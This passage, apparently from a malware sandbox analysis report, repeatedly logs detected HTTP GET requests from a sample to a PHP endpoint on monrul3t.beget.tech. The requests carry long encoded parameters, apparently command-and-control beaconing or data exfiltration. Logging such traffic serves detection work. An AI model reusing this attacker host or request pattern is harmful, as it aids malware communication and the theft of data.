WzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpNGROpXV610dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiIjNWYmZmYkJmMzYDMxUDM1QWO2E2MmVWOxgjYjlTZjNDNiZGO3UjN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMul0dBp2T1kkaPpXSqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOlXRqp1dJNETpV1QNl2bql0aaR0TtJkaZJTRqlFaGdVTsZEVPFTSykFbWpWTshGRNdXRq5UMjpXWsJEVZBTRX9UaK1mWyk0QMlWVD10dFpWS2k0QNFTUU1kMZRkTyUEVPtmU610dJ1mW6llaaBzZU5ENRd1TqZkaaBTQUlFaa1mTsZlaORTV61Ua3lWSvkUaPlWUql1MV1WWqZ1VNpmV61kMBpnTrxGVNpmSH9UbSdkTyklMNhXTUpVeVRVTzkFVNRTWH90MnpWSzlUeQl2bql0dnRkWxE1RadXRE1UeVR0T1UlMZhmUy4UbCRlW0U1VZhXRy00MNpmT0kVbOBzaU10akRUT4l0QMlWTYJ2ZrpXTp9maJRzZU5Uaa1WTw0kaZpmVX10MJJTT5F1RaJTRyk1aGpmTsJlMOxmUtpVaO1mTsJkeO1mUql1aKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJhkTwQFRKpWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpNGROpXV610dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiIjNWYmZmYkJmMzYDMxUDM1QWO2E2MmVWOxgjYjlTZjNDNiZGO3UjN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
